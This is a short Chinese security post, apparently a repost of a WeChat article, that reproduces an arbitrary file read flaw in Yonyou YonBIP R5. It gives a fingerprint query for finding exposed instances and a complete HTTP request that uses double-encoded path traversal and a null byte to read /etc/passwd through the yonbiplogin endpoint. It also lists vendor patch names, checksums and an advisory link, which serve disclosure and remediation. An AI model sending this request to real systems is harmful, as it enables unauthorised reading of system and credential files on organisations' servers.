0x02
title="数字化工作台" || title="YonBIP"
GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg.js HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: application/x-www-form-urlencodedConnection: close
知识星球:冷漠安全
YonBIP V3.0(R5_2312_SP240517);
补丁名称:TNS_iuap-fe-webhome_iuap.V6.R5_2312_SP240517_36_QP20240927-2
校验码:dbe6149dab9dce75e81717d7a343861cfd81306b
依赖补丁:TNS_iuap.V6.R5_2312_36_SP20240605-2
YonBIP V3.0(R5_2312):
补丁名称:TNS_iuap-fe-webhome_iuap.V6.R5_2312_36_QP20241021-2
校验码:a35e4160d7b7aab7e68fc9cd0cc36e5c05011058
YonBIP V3.0(R5_2312):R5 standalone版本补丁
补丁名称:TNS_iuap-fe-webhome_iuap.V6.R5_2312_37_QP20241024-1
校验码:8ee58fbaac546a8278924579ba0e38e339a418c0
备注:
1025(包含)以上版本合集补丁包含该安全补丁
https://security.yonyou.com/#/noticeInfo?id=627原文始发于微信公众号(冷漠安全):「漏洞复现」用友YonBIP R5旗舰版 yonbiplogin 任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论